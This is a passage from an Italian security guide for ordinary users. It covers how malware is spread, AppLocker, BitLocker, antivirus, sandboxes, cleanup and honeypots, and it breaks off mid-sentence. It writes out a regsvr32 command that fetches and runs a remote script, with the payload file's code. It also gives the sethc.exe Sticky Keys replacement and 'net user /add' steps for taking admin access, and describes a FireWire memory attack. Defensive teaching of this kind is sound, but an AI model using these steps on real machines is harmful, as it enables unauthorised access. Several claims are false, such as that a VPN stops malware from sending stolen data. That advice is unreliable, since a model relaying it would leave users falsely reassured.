Ora che abbiamo visto come possono gli hacker scavalcare le nostre
protezioni è il momento di vedere come e dove distribuiscono i vari tipi di
Malware che abbiamo visto prima.

Prima di tutto una cosa fondamentale da comprendere è che nel 90% dei
casi, non è possibile essere infettati se non si esegue il programma contenente
il virus, nessun Malware può auto eseguirsi, a meno che l’hacker non utilizzi
un Exploit del browser, o abbia accesso diretto al pc e inserisca una chiavetta
USB eseguendone automaticamente il contenuto all’interno

Probabilmente alcuni di questi metodi di distribuzione ti lasceranno a

bocca aperta, iniziamo:

Youtube

Ebbene sì, Youtube è uno dei vettori preferiti dagli hacker per infettare le loro
vittime, in pratica creano un video di 30-40 secondi per adescare le persone e
convincerle a scaricare per esempio un crack di un programma a pagamento
come Photoshop con dentro un Malware, visto che i computer da infettare più
ambiti sono quelli potenti, in genere cercano di mirare alle persone con un PC
da Gaming, in modo da poter rivendere gli account delle vittime, e utilizzare
la loro potenza per massimizzare i profitti tramite un miner di bitcoin.

Vediamo per esempio se cerchiamo un generatore di codici

promozionali di Steam, famosa piattaforma utilizzata dai giocatori di tutto il
mondo Google che risultati ci dà:
 Li ho testati tutti personalmente, come possiamo vedere alcuni Hacker
creano programmi fasulli per nascondere meglio il Malware e blindano il
tutto con un Malware, la ricerca di Keygen e Crack porta sempre nella
maggior parte dei casi ad un unico, inevitabile risultato…l’infezione.
La cosa più pericolosa come puoi vedere è che questi video si
posizionano anche sul motore di ricerca organico, quindi gli hacker possono
rivolgersi ad un pubblico abbastanza alto e visto che la maggior parte delle
persone che cercano questo tipo di generatori sono ragazzini, è abbastanza
facile infettarli data la loro ingenuità.

Anche se ti sembra una buona opportunità, non scaricare mai niente da

un video di Youtube, pensaci bene, perché qualcuno dovrebbe perdere il suo
tempo per creare un video e caricare un file su internet? Ovviamente si
aspettano qualcosa, e quel qualcosa potrebbe essere l’accesso al tuo
computer.
Forum

Gli hacker conoscono molto bene la prova sociale, quando intendono

attaccare gli utenti di un forum sono molto pazienti, prima cercano di crearsi
una reputazione pulita, postando contenuti utili e contribuendo alle
discussioni in maniera costruttiva, ma appena gli utenti del forum iniziano a
fidarsi, può iniziare a infettare tutti condividendo programmi infetti, mi
spiego meglio.

Se l’hacker ha preso di mira un forum frequentato da persone a cui

interessa per esempio un cantante in particolare, dopo aver guadagnato la
fiducia della comunità che lo popola, non gli resta altro da fare che creare uno
screensaver e unirlo ad un Malware, condividendolo sul forum può
velocemente infettare molte persone.

Questo è uno dei metodi più scelti perché è possibile scegliere il tipo di
vittime da infettare in base ai propri scopi, esistono molti forum che vengono
frequentati da imprenditori, bersagli interessanti per chiunque voglia
effettuare operazioni fraudolente.
Java Drive Applet

Questo metodo di distribuzione è uno dei più sofisticati in circolazione, in

quanto non necessita il download del file infetto da parte dell’utente e il
successivo click per avviare il Malware, mi spiego meglio.

Il Java Drive è un applet programmato in Java, ti è mai capitato di

incorrere in queste finestre dove ti viene chiesto di avviare un applet Java per
rendere funzionante uno script presente su un sito web?

Una volta cliccato avvia, l’applet scarica ed esegue un file exe (criptato)
sul pc della vittima e lo infetta con il Malware senza che l’utente abbia
scaricato apparentemente niente, spesso gli hacker utilizzano questa tattica
assieme alle live webcam, per esempio:

“Per avviare la webcam avvia l’applet Java”

In questo modo la vittima lo avvia, la webcam funziona ma non si
accorge che ormai è stato infettato.
 Inoltre se utilizzi delle vecchie versioni di Java, aggiornale
immediatamente perché è disponibile un metodo simile a questo chiamato
Java Drive Silent, che sfrutta delle vecchie versioni di Java per auto eseguirsi
senza il permesso dell’utente, quindi basta visitare una semplice pagina web
per venire infettati.
Social Networks

Te lo aspettavi giusto? Dopo la spiegazione dei Worm, i Social dovevano per

forza esserci in questa lista, stanno diventando sempre più popolari per
diffondere Malware grazie alla viralità con la quale girano i contenuti.

Gli hacker diffondono il Malware sui social in due modi, il primo, è

tramite i Worm, automaticamente accedono al tuo account di Facebook
rubando i cookie in maniera silenziosa e postano un messaggio a tutta la tua
lista amici o in bacheca, dove li incita a vedere una loro foto a detta tua
trovata su un sito pornografico per incuriosire la persona a scaricare il
pacchetto con le foto e vederle, in modo da infettarsi a loro volta. Il metodo
può variare a discrezione dell’hacker.

Il secondo metodo utilizza l’applet java drive che abbiamo visto prima,
in pratica l’hacker crea una pagina Facebook fasulla dove condivide notizie
di dubbia provenienza, come ipotetiche foto pornografiche di una show girl
famosa, in modo che la persona incuriosita clicchi sul link, accetti l’applet per
visionare le foto o il video e viene infettata.

Personalmente ho visto questi fenomeni svilupparsi più su Facebook

che in altri social, è importante stare sempre in guardia e analizzare con cura i
contenuti che ci compaiono in bacheca.
Torrent

Non sono favorevole alla pirateria e questo non è un mio tentativo di

scoraggiarla, ci sono persone che genuinamente investono il proprio tempo
per condividere programmi e crack solo per il gusto di farlo, mentre ce ne
sono altri che fanno questo solo per infettare qualche vittima extra, unendo al
programma che condividono, anche un Malware.

Dato che il 35% di tutto il traffico mondiale proviene dalla pirateria, gli
hacker la utilizzano per aumentare i loro profitti, e questo numero è destinato
ad aumentare in futuro.

Tempo fa era uno dei metodi più utilizzati da chi voleva iniziare a
mietere qualche vittima ma non sapeva dove iniziare, visto che ci sono
centinaia di persone che ogni giorno scaricano materiale protetto da copyright
illegalmente, non è difficile ottenere 20-30 vittime al giorno solamente
condividendo qualche programma infetto.
Email

Le email sono il vettore preferito per chi cerca di infettare aziende o privati,
l’email permette al malintenzionato di crearsi un’immagine e rendersi
convincente agli occhi del lettore, molti credono che un virus possa essere
solo formato eseguibile, ma prima abbiamo visto che non è sempre così

Poche persone sanno che esistono alcuni strumenti che permettono di

unire il proprio Malware ad un documento Word o PDF, se il Malware in
questione fosse allegato in una mail, l’utente vedrebbe semplicemente un
documento.

È di vitale importanza capire questo concetto, quando si tratta di

Malware niente è ciò che sembra, se ricevi una mail con dentro un
documento Word o PDF, anche se conosci il mittente, analizzalo con la
dovuta cautela prima di aprirlo, tra poco vedremo come.

Questi non sono gli unici canali di distribuzione ma già stare attenti a
questi significa ridurre al minimo il rischio di infezioni, molto spesso gli
hacker creano dei veri e propri programmi con tanto di sito web ufficiale per
far passare il loro Malware come più naturale possibile, stare attenti a cosa si
clicca o scarica può fare una grossa differenza.
Capitolo 7: Adottare Misure Proattive e Retroattive
Per Proteggersi Da Infezioni

Ormai vengono rilasciati circa 390,000 esemplari di Malware ogni giorno, le

misure di sicurezza reattiva hanno fallito, chiunque si basi solamente su
quelle per difendere il proprio sistema, prima o poi avrà una brutta sorpresa,
quindi in questo capitolo parleremo di come implementare delle misure di
sicurezze proattive e di seguito vedremo quelle reattive utilizzate fino adesso.

Quando si parla di sicurezza proattiva, quasi tutti storcono il naso

perché per la maggior parte delle persone essere sicuri equivale ad installare
un buon antivirus e stare attenti a quello che si clicca, ma quando si lavora in
ambienti dove c’è bisogno di misure di sicurezza più efficienti, quelle non
bastano più, ed è così che entrano in gioco queste misure proattive.

Come primo strumento parleremo di AppLocker, che ci permette di

bloccare qualsiasi tipo di applicazione che cerca di avviarsi sulla nostra
macchina stabilendo precise policy, un errore comune è quello di scegliere di
bloccare per esempio solo i file exe, o altre estensioni, purtroppo questo non
risolve il problema perché i Malware possono camuffare la loro estensione, il
modo corretto di utilizzare AppLocker è quello di permettere l’avvio solo a
certe applicazioni, come per esempio qualche programma che utilizziamo per
lavorare e altri software chiave.

Una guida esaustiva su come utilizzare AppLocker è presente sul sito di

Microsoft, quindi non sento il bisogno di riscrivere quello che già è
disponibile sul sito ufficiale.

Per accedere ad AL, avviare “secpol.msc” con privilegi di

amministratore e selezionare “Application Control Policies” clicca su
AppLocker e seleziona “configure rule enforcement”, dopo di che espandi
AL e tasto destro su Executable Rules per generare le regole di default.
 In mancanza di altre strategie, AppLocker da solo può fare ben poco, in
quanto un malintenzionato che ha accesso alla macchina può bypassarlo con
un semplice comando nel CMD o la Powershell senza essere elevato ad
amministratore, basta un account user comune.

Tutto quello che un hacker deve fare, è utilizzare i regsvr32 per lanciare
un remote file inclusion, dove scarica un file maligno dalla rete e lo esegue,
questo è il proof of concept da utilizzare nella shell o cmd:

regsvr32 /s /n /u /i:http://server/filemaligno.sct scrobj.dll

L’estensione non ha importanza, può essere qualsiasi cosa, mentre

questo è il contenuto del file maligno:

var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");

Questo script non fa altro che aprire il cmd se è stato bloccato da
applocker, ma è possibile fare molto di più, perfino creare una backdoor nel
sistema, a questo indirizzo è possibile vedere altri POC:

https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302

Per correggere questo exploit, basta aggiungere una regola firewall al

processo regsvr32 in modo che non possa accedere ad internet.

AppLocker rappresenta un ottimo alleato, ma senza la seconda

contromisura proattiva che vedremo adesso, è utile quanto buttare benzina sul
fuoco, sono sicuro che molti fanno questo errore sulle proprie macchine,
molti per pigrizia, altri perché non ne immaginano le ripercussioni.
 È estremamente importante non utilizzare mai il proprio computer come
amministratore perché in quanto essendo tale, può bypassare facilmente
qualsiasi protezione, proattiva o reattiva, basti pensare che le policy di
AppLocker non hanno effetto sugli account con potere di admin.

Per utilizzare il nostro computer senza privilegi di amministratore

abbiamo due scelte:

1. Creiamo due account e utilizziamo il nostro computer sempre come

utente comune, facendo questo possiamo mitigare il rischio di avviare
programmi maligni quasi a zero, quando scegliamo di avviare un file come
amministratore però incorriamo in due problemi, il primo è che dopo aver
avviato il documento o programma come admin, non è più il nostro
documento, ma dell’admin ed in più la password che dovremmo inserire per
avviare il file, sarà salvata nelle cache di sistema.

2. La soluzione più sicura ed efficace specialmente in ambiente aziendale,

consiste nell’elevare solamente alcuni processi o cartelle, non è possibile fare
questo utilizzando gli strumenti di default di Windows, quindi per chi è serio
riguardo la propria sicurezza consiglio il software “avecto.com/defendpoint”.

Per essere totalmente protetti abbiamo bisogno della terza contromisura

proattiva, in quanto se utilizziamo AppLocker con privilegi di admin è
possibile bypassarlo con facilità, mentre se utilizziamo AppLocker senza
privilegi di admin, un hacker può facilmente elevarsi ad admin utilizzando
uno 0day o qualche exploit privato.

In verità c’è un modo estremamente semplice per avere accesso admin

ad un computer, ma necessita l’accesso fisico a quest’ultimo, questo exploit è
particolarmente pericoloso in ambito aziendale dove un impiegato arrabbiato
può creare seri danni al network, la procedura per sfruttare questo exploit è
abbastanza semplice.
 È sufficiente un CD o chiavetta USB con una qualsiasi versione di
Windows al suo interno e una volta collegata dobbiamo avviarla dal boot
come se volessimo reinstallare il sistema operativo, una volta nella schermata
clicchiamo ripara e ci ritroveremo su questa schermata dove la prossima cosa
da fare sarà avviare il command prompt:

Una volta completata questa operazione e dopo che si è aperto il

command prompt, facciamo un backup del file da sovrascrivere in modo da
non destare sospetti, possiamo farlo in questa maniera:

copy c:\windows\system32\sethc.exe c:\

In pratica questo exploit si sfrutta sovrascrivendo il processo che

gestisce le Stick Keys con il cmd.exe ossia il command prompt, dopo aver
effettuato il backup nella root del disco locale C, possiamo procedere con il
comando vero e proprio.
 copy c:\windows\system32\cmd.exe
c:\windows\system32\sethc.exe

Abbiamo completato così la parte più complessa dell’operazione,

adesso non ci resta altro da fare che espellere il cd di installazione oppure
rimuovere la chiavetta USB, avviare Windows normalmente e aspettare di
essere sulla schermata di login, dopo di che si utilizza il comando per avviare
le Sticky Keys, ossia premere shift 5 volte consecutive, e dovrebbe apparire
al posto del processo il cmd.exe che ci abbiamo sovrascritto sopra:

Adesso non ci resta altro da fare che creare un secondo admin nel
sistema o reimpostare la password di uno di quelli già in essere, un hacker in
genere sceglierà sempre di crearne un altro al posto di cambiare la password
ad uno già presente in quanto metterebbe in allarme il reparto IT all’istante.
 Per creare un altro account, possiamo sia avviare il programma
“compmgmt.msc” da scrivere direttamente nel cmd e si aprirà questo
programma, dopo di che non bisogna fare altro che cliccare su “Local User
and Groups” ed aggiungere direttamente l’account manualmente.

Mentre se si preferisce utilizzare stesso il cmd senza aprire nessun

programma secondario, basta seguire utilizzare questo comando:

“net user nome password /add”

Qui puoi trovare una lista completa di comandi per compiere operazioni
più complesse:

https://technet.microsoft.com/en-us/library/cc771865(v=ws.11).aspx

Per bloccare questo tipo di attacchi, viene in genere impiegata la terza

contromisura che consiste nel criptaggio del hardisk attraverso programmi già
preinstallati in Windows come bitlocker o altri esterni come veracrypt.

Bitlocker è la scelta migliore in genere in quanto è più veloce ed utilizza

il protocollo TPM 2.0, ossia conserva la chiave segreta dell’encriptazione in
un chip specifico della scheda madre, alcune schede vengono premunite di
chiavette USB già configurate per fungere da chiavi per il sistema, come la
chiave di casa per esempio, se ti trovi in una situazione dove è necessario
proteggere le tue informazioni a tutti i costi, non posso che raccomandarle.

La ragione per cui il TPM è raccomandato è che se un hacker ha libero

accesso alla tua macchina, può semplicemente rubare l’hard disk, portarselo a
casa e decriptarlo, se invece abbiamo scelto di utilizzare il protocollo TPM,
questo tipo di attacco non funzionerà, l’hard disk sarà inusabile.

Purtroppo non tutte le schede madri posseggono questa funzionalità, ma

si può rimediare facilmente utilizzando il “Local Group Policy Editor”
avviandolo con “gpedit.msc”.

E selezionando l’opzione di poter utilizzare bitlocker anche senza il

protocollo TPM, consiglio comunque se si lavora in un’azienda dove la
sicurezza è una cosa seria, di munirsi di scheda madre compatibile

Quando utilizziamo bitlocker, possiamo scegliere se utilizzare un pin

per accedere al nostro computer, oppure un supporto hardware da inserire
come una chiavetta USB, per chi ne ha bisogno è anche possibile utilizzare
entrambi i sistemi di autenticazione.

Se sei interessato ad un livello di sicurezza di grado militare, esistono

delle chiavette usb che per essere sbloccate e quindi lette da un supporto,
devono essere sbloccate con un pin, questo le rende sicure in caso di
smarrimento e clonaggio.

Per quanto riguarda la compatibilità con bitlocker, la chiavetta tratterrà

una parte della chiave segreta necessaria per avviare il computer ed ogni volta
che effettuiamo un riavvio, sarà necessario reinserire il pin, sbloccare il
dispositivo USB ed inserirlo nel computer, il prodotto in questione si chiama
LOK-IT.

Queste sono soluzioni estreme, se vuoi un buon livello di sicurezza

senza ricorrere a queste strategie governative, va benissimo impostare
bitlocker con solo un pin, dato che una password sicura sarà impossibile da
indovinare.
 Anche se questo sistema sembra sicuro, ci sono alcuni attacchi che
possono mettere fuori uso queste protezioni, vediamole assieme alle
contromisure.

Per prima cosa contro l’encripting dell’hard disk è possibile lanciare un

attacco che si chiama “Princeton Attack” e si basa sul principio che una volta
che il computer viene sbloccato, la chiave rimane in memoria fin quando al
riavvio, viene sovrascritta da quella nuova, durante l’attacco l’hacker cerca di
recuperare la chiave intatta prima che venga sovrascritta, quindi inserisce una
chiavetta USB con il kernel Linux più piccolo che riesce a trovare, con la
speranza di non cancellare la chiave al riavvio, se l’attacco riesce, ha
completo accesso alla macchina.

Come contromisura, è sufficiente attivare l’opzione di boot sicuro dal

BIOS della scheda madre, molte persone direbbero che è una procedura
standard in quasi tutti gli ambienti di lavoro, purtroppo per esperienza diretta,
posso affermare che solo una manciata di persone ho visto utilizzare il bot
sicuro.

Come secondo attacco, troviamo i DMA attacks che sono attacchi con
obiettivo la memoria della macchina, funzionano su tutti i sistemi operativi,
ossia Linux, MacOs e ovviamente Windows.

Questi attacchi bypassano il sistema operativo, quindi non c’è niente

che l’utente possa fare, l’unica opzione è non lasciare mai il computer
incustodito, soprattutto nella schermata di login, perché l’attacco che
vedremo adesso si basa proprio sul manipolare il modulo responsabile per
l’autenticazione delle password di Windows.

Prima di tutto dobbiamo collegare il nostro laptop a quello della vittima

attraverso l’interfaccia FireWire o altre compatibile con il tool che stiamo
utilizzando.
 Dopodiché avviamo l’hack tool “inception” che viene utilizzato appunto
per svolgere questo tipo di attacchi, ce ne sono vari disponibili online, da
quelli per l’analisi forense, fino a quelli come questo che modificano il
modulo di controllo delle password errate di Windows, in modo che ad
attacco ultimato, possiamo accedere in qualsiasi account sul computer
inserendo una password a caso.

Prima di tutto dobbiamo specificare il sistema operativo della vittima,

una volta selezionato, lo script in python farà la sua magia e modificherà il
modulo di controllo della password, così che l’hacker possa avere accesso al
computer inserendo qualsiasi parola.

Come vedi sono attacchi pericolosi, specialmente se hai l’abitudine di

lasciare il tuo computer incustodito per ore, esistono altri script più avanzati
in grado di svolgere operazioni di analisi forense, come scaricare l’intera
memoria per poi analizzarla in cerca di password e dati sensibili, sono spesso
utilizzati dalla polizia.
 In questi casi, l’unica contromisura possibile è tenere il computer
sempre sotto controllo quando è acceso, in quanto questo tipo di attacco
funziona solamente quando il computer è acceso e non spento.

Riassumendo il metodo di sicurezza proattiva, possiamo metterlo in

chiave visuale guardando questo diagramma:

C’è sicurezza solo quando queste 3 variabili lavorano assieme, se una di

queste viene a mancare, l’hacker può facilmente bypassare tutte le altre.

Dopo aver reso sicuro il computer implementando queste tre misure

proattive, possiamo vedere in fine di adottare oltre a quelle, anche sei
contromisure reattive.

Il primo passo per avere un computer sicuro utilizzando misure di

sicurezza reattive, è scegliere un buon Antivirus, può sembrare scontato
forse, ma pochi sanno quali sono gli Antivirus che vale la pena acquistare,
durante i miei test dove cercavo di rendere invisibile un Malware (solo per
scopi di studio), ho provato letteralmente con qualsiasi protezione disponibile
sul mercato e i tre che mi hanno dato più filo da torcere sono in ordine di
efficacia…

ESET Nod32 – Kaspersky – Bitdifender

Inoltre un secondo software assolutamente fondamentale che utilizzo

come complementare per eliminare Rootkit e identificare Malware che non
vengono identificati da quei tre AV sopra è MalwareBytes, ha un prezzo
molto accessibile e se sei a corto di fondi, puoi semplicemente optare soltanto
per quest’ultimo.

Non ho ricevuto alcun compenso in danaro per raccomandare questi tre,

sono solo stati i più veloci a identificare i miei file una volta criptati e hanno
richiesto ore di lavoro per rendere il Malware invisibile, molti utilizzano
Avast, mi dispiace dirlo ma per me non si è rivelato molto efficace.

Se invece vuoi sottoporre il tuo file sospetto alla scansione di molteplici

Antivirus, Virustotal.com ti permette di scansionare il tuo file con più di 57
diversi AV tutti in una volta, e in più manda un campione alle varie
compagnie di antivirus per ulteriori analisi, se viene identificato un Malware,
viene incluso del seguente aggiornamento di definizioni.

Tranquillo, gli Antivirus non sono l’unica contromisura retroattiva che

puoi prendere, ma sono la tua prima difesa, quindi è meglio sceglierlo bene e
se ci tieni ai tuoi file, il prezzo che chiedono, specialmente Nod, non è troppo
alto.

Molti credono che il firewall sia importante, la triste verità è che ogni
Malware che si rispetti ha inserita una speciale funzione per Bypassarli, in
genere non consiglio di installare un Firewal, se avessimo da proteggere
informazioni molti importante come misura precauzionale extra, consiglierei
l’uso di un Firewall hardware.

Quelli firewall software invece lasciano davvero il tempo che trovano,

ma se proprio vuoi installarne uno sul tuo computer, comodo.com è gratuito
ed è davvero un ottimo Firewall.

La Seconda contromisura attualmente più usata è quella di creare una

macchina virtuale sul proprio pc, in pratica si tratta di un secondo sistema
operativo, completamente isolato dal tuo principale, dove puoi avviare
eseguibili che ti sembrano maligni, per analizzarli ed eseguirli in un ambiente
protetto dove non comportino alcun rischio per il tuo sistema principale.

Molti scelgono di utilizzare Linux con un emulatore Windows come

Wine per analizzare per bene i file, ma per l’utente medio, una semplice
installazione di Windows va più che bene.

In genere le macchine virtuali vengono utilizzate anche dagli hacker per

attaccare bersagli, in quanto le partizioni possono essere cancellate con un
solo click, senza lasciare log o altro che può rendere note le loro azioni.

Il miglior software che a mio avviso porta bene il lavoro a termine è

VirtualBox, semplicissimo da installare e utilizzare.

La Terza contromisura che puoi prendere se non vuoi installare una

macchina virtuale sul tuo pc e non vuoi rinunciare ai privilegi di
amministratore, è un programma chiamato Sandboxie:
 In pratica questo programma ti permette di eseguire un file exe in una
partizione chiusa del tuo pc per analizzarne il comportamento, lo utilizzo
sempre quando scarico un file eseguibile, prima di eseguirlo sul mio PC, se
mentre lo apro con Sandboxie vedo che estrae un file exe che non dovrebbe,
come un secondo exe o altra robaccia, chiudo la partizione ed elimino il file,
ecco un esempio di file infetto.
 Dllhost.exe in genere è un file di Windows, proprio per questo spesso
gli hacker scelgono questo nome per confondere l’utente più inesperto.

Ho aperto uno dei file che abbiamo visto prima su Youtube, quando
l’ho aperto è comparsa un’applicazione fantoccio di Steam che mi ha
addirittura consegnato una chiave per scaricare un gioco gratis (chiaramente
non funzionante) e ha decriptato ed estratto un file exe nella cartella temp, da
qui possiamo capire che il file che abbiamo aperto è un Malware, non è
assolutamente normale per un file lecito, droppare file eseguibili di punto in
bianco…più avanti mostrerò come è possibile analizzare il Malware e
rintracciare l’hacker che l’ha distribuito.

Sandboxie è un ottimo alleato per la nostra sicurezza e dovrebbe essere

installato su tutti i sistemi Windows di default, in quanto è gratuito e ci
permette di testare file eseguibili sospetti.

Ultimamente mi è capitato di studiare dei File che utilizzano un sistema

detto SandBoxie Bypass, in pratica tutto quello che fa è rendere il programma
non funzionante quando l’utente lo prova con SandBoxie, se questa cosa
dovesse succedere a te, non provare ad avviarlo fuori, probabilmente è un
virus.

Ma se abbiamo ancora dubbi su un file sospetto ma non siamo sicuri se

eliminarlo oppure no, esiste un servizio che ci permette di analizzare il file
exe per scoprire dal sorgente se si tratta di un Malware oppure no, pochissime
persone sono a conoscenza di questo servizio e mi ha salvato tante volte da
potenziali infezioni, si tratta di Deepviz, la quarta contromisura.

Se vuoi controllare un exe sospetto, vai su sandbox.deepviz.com, clicca

su sfoglia e carica il tuo file, in pochi minuti saprai se si tratta di un file
maligno oppure no. Attenzione, a volte gli Hacker criptano il file con
algoritmi indecriptabili per impedire l’analisi a servizi come deepviz, se così
fosse probabilmente è un Malware al 99%, un programmatore serio non
cripterebbe mai i suoi file, a meno che non vuole proteggere la sua proprietà
intellettuale.

Per chi fa davvero sul serio e ci tiene alla propria sicurezza, questa è la
quinta contromisura, mi sento di consigliare questo programma che ti
permette di tenere sotto controllo i tuoi processi attivi e avviare solo quelli da
fonti conosciute e sicure, il suo nome è “NoVirusThanks EXE Radar Pro” ed
è possibile usufruire di una versione di prova per 30 giorni, dopodiché il
costo del software è $19,99, ma a mio avviso li vale tutti.

Questo è il primo programma che consiglio quando si utilizza il

computer per lavorare e si devono tenere al sicuro delle informazioni, il
prezzo è davvero basso.

Link: http://www.novirusthanks.org/products/exe-radar-pro/

Come sesta e ultima invece, se vogliamo navigare sicuri con la

consapevolezza che nessuno sta spiando il nostro PC, dobbiamo navigare
utilizzando un VPN, ma cos’è?

In pratica è un programma che ci permette di collegarci ad un host (altro

sito) criptando tutti i nostri dati e nascondendo la posizione, ma non è questo
il motivo principale.
 Quando un hacker installa sul nostro sistema un Malware ha bisogno
del nostro indirizzo IP per ricevere le informazioni che desidera, nel caso di
uno Stealer, se noi stiamo utilizzano un VPN e il Malware sta cercando di
inviare i dati, ossia le nostre password presso una casella di posta, sito web o
server FTP non sarà in grado di farlo perché tutti i dati saranno criptati.

Stessa cosa per un Trojan, anche se è attualmente installato sul nostro

sistema l’Hacker non sarà in grado di collegarsi, quindi tutto risulta inutile.

Esistono molti provider che offrono servizi del genere online, come
alternativa gratuita consiglio openvpn.net, ma in genere io utilizzo solo
servizi a pagamento che garantiscono anonimato e un forte algoritmo per la
cifratura.

Per finire, ecco un elenco di cose da non fare e da fare, se ti atterrai alle
istruzioni, posso garantirti che le possibilità di prendere un qualsiasi tipo di
Malware sul tuo PC si ridurranno all’1%.

-MAI aprire direttamente i file che ti arrivano per posta elettronica,

specialmente se ti arrivano da indirizzi che non conosci, i tuoi amici inoltre
possono inviarti Malware essendo infettati in modo non consapevole.
-MAI aprire nessun file prima di averlo scansionato con il tuo AV.
-MAI avviare file eseguibile che non conosci, anche se sono risultati puliti
dal controllo con l’AV usa Sandboxie per effettuare ulteriori controlli.
-SEMPRE aggiornare il tuo AV e tenere sempre aggiornato il browser ed I
suoi add-on, Java etc etc…
-MAI avviare java applets su siti che non conosci o che non hanno un
certificato

Se si trattasse di ambiente aziendale, consiglierei sempre di utilizzare la

navigazione sotto VPN per una protezione maggiore, magari con un router
che supporta la funzione, altrimenti si incorre in difficoltà nel far passare
informazioni tramite la rete locale.

Nessuno può garantire al 100% la sicurezza del tuo sistema, domani gli
Hacker potrebbero trovare una vulnerabilità in Google Chrome o Firefox che
permette di scaricare ed eseguire un file automaticamente, con un Rootkit che
Bypassa tutte le protezioni e si nasconde nel sistema.

In quel caso non si potrebbe fare niente, i consulenti per la sicurezza

servono a questo, ad identificare infezioni dove il resto fallisce, analizzando
manualmente tutto.
 Capitolo 8: Ripulire il Computer Da Malware

Spesso mi chiedono come rendersi conto se si è infetti da un Malware,

purtroppo la risposa non è semplice perché ogni Malware ha una sua
sintomatologia, e se per esempio si tratta di un trojan, come abbiamo detto
prima di certo un hacker in gamba, non perde il suo tempo a spegnere
monitor, aprire il vano cd e far fare strani suoni al computer.

Il 99% degli attacchi degli Hacker è User Spot, ossia ha effetto solo se
l’utente clicca un file infetto, quindi dobbiamo essere in grado di riconoscere
l’infezione appena si presenta.

Se siamo stati sbadati e abbiamo aperto un file con allegato un codice

maligno, la prima cosa da fare è scollegarsi da internet e dalla propria rete
lan, in questo caso impediamo la fuoriuscita di informazioni sensibili e
infezioni ad altri computer della rete.

In pratica il computer non dovrà mai essere collegato ad internet finché

non si elimina il Malware, se è proprio indispensabile, utilizza un VPN per
criptare i tuoi dati in entrata e uscita.

La prima cosa da fare è effettuare una scansione con il proprio antivirus

per controllare se il Malware è identificabile in Runtime, ma in genere solo
un hacker principiante commette questo errore.

Se l’Antivirus non rileva nessuna infezione, la seconda cosa da fare è

ispezionare tutti i processi attivi del computer tramite il Task Manager, se lo
si identifica basta selezionarlo, cliccare tasto destro e selezionare

“Apri percorso file”, una volta visto il file, terminarlo sul Task Manger
ed eliminarlo.
 Una volta fatta questa operazione, c’è ancora una piccola cosa che
dobbiamo eliminare, ogni Malware si inserisce negli avvii automatici per
essere eseguiti nuovamente al riavvio del sistema, molti posseggono una
funzionalità che si chiama persistenza, ossia se eliminiamo prima l’avvio
automatico, il Malware la ricreerà per potersi riavviare nuovamente, ecco
perché conviene eliminare prima l’exe.

Per eliminarlo definitivamente, basta andare sempre in CCleaner,

strumenti, avvio e li possiamo cancellare disattivare o attivare i programmi
che si avviano una volta che accendiamo il computer.

Se non sei pratico probabilmente quasi la metà dei processi che vedrai ti
sembreranno nuovi, per questo ti consiglio di utilizzare un programma come
HijackThis che scansiona automaticamente i tuoi processi attivi e altri
parametri, generando poi un file log che puoi analizzare.
 Una volta scansionato il sistema e generato il file di log, non dovrai
analizzarlo tu, ma copiarlo e incollarlo dentro la casella su:

http://www.hijackthis.de/it.
 Una volta inseriti i dati che ti verranno consegnati a fine scansione,
clicca analizza e verrai portato su una pagina dove sarà analizzato ogni
processo e vedrai praticamente quali rappresentano una minaccia e di
conseguenza da eliminare.

Una volta eliminato il processo, dobbiamo eliminare i file residui, è

possibile farlo a mano ma c’è un programma che fa molto bene il suo lavoro,
ossia PrivaZer, ottimo per eliminarne completamente le tracce, è anche un
buon alleato della privacy.

Probabilmente se abbiamo fatto tutti questi passaggi il Malware è

eliminato, collegarsi ad Internet con un VPN e ispezionare nuovamente i
processi, se non viene fuori niente, puoi navigare tranquillo.
 Capitolo 9: Operazione Honeypots

Questo è uno di quegli argomenti che avrei voluto conoscere anni fa, gli
Honeypots nacquero nel 1990 come tecnica di spionaggio, allora erano solo
per uso militare e non furono divulgati al pubblico fino al 1998 dove venne
rilasciata la prima applicazione commerciale di nome CyberCop.

Il principio degli Honeypot si basa sul fatto che è più semplice catturare
una falena utilizzando una luce al neon che un retino, detto in modo
specifico, gli Honeypot non sono altro che sistemi presenti all’interno o
all’esterno di una rete locale messi lì apposta per essere attaccata e registrare
ogni azioni compiuta dall’hacker.

A seconda dell’azienda, ci sono vari tipi di Honeypots che è possibile

utilizzare per proteggersi, questi si rivelano utili per scoprire falle prima che
l’azienda vada online, o durante, ecco le due categorie principali:

Production Honeypots

Vengono utilizzati prevalentemente per la protezione e possono variare

in modelli di sicurezza come vedremo più avanti, il loro unico scopo e
camuffarsi da server con informazioni vitali, in modo che l’hacker sia
ingannato a pensare che la macchina che sta attaccando sia il cuore
dell’azienda, quando in realtà non è che una mera emulazione che permetterà
ai responsabili della sicurezza di spiare ogni sua mossa, mentre si fa breccia
dentro il sistema, questo è un’ottima misura in quanto è possibile rafforzare la
propria sicurezza in seguito agli attacchi che verranno lanciati.

Research Honeypots

Questi invece vengono utilizzati per valutare i rischi che l’attività

potrebbe incontrare andando online o utilizzando il proprio sistema
proprietario sulla rete, sono Honeypots che vengono resi vulnerabili di
proposito per incitare qualsiasi attacco, spesso i meno esperti o quelli che
utilizzano scanner automatici cadono in questo tipo di trappola, in genere i
sistemisti informatici più esperti utilizzano reti fantoccio, camuffandole con il
nome dell’azienda in questione per attirare gli hacker e indurli a dar via i loro
segreti, e il più delle volte riesce piuttosto bene.

Gli Honeypots sono sistemi autonomi, che se settati correttamente

richiedono un volume di risorse molto ridotto, anche se si tratta di proteggere
o ricercare exploit per una grande azienda che gestisce una grande mole di
traffico, i loro bassi costi di manutenzione si basano sul fatto che sono in
grado di collezionare dati soltanto quando un hacker sta effettivamente
attaccando il sistema, evitando tutti i falsi positivi, questo rende la vita più
facile anche agli esperti di sicurezza che invece di correre ogni 20 minuti a
vedere cosa succede, vengono allertati quando davvero sta succedendo
qualcosa di rilevante.

Esistono vari modelli di Honeypot, da quello wireless a quello wired, da

quello formato da un vero sistema operativo funzionante a quelli che emulano
solo alcuni servizi, come server ftp o http, fino ad arrivare a quelli che
utilizzano firewall hardware e firewall software, di seguito trovi il
diagramma:
 Niente di estremamente complesso ma andiamo per gradi, la prima cosa
che l’hacker incontra quando cerca di penetrare il network è il firewall, nei
research honeypot se ne fa volentieri a meno in quanto lo scopo primario
come detto prima è attirare e ingannare l’hacker ad attaccare simulando un
sistema non protetto a norma, mentre nel caso dove ci troviamo a proteggere
un vero network è mediamente consigliato, vediamo perché.

I firewall, sia quelli software che quelli hardware non proteggono

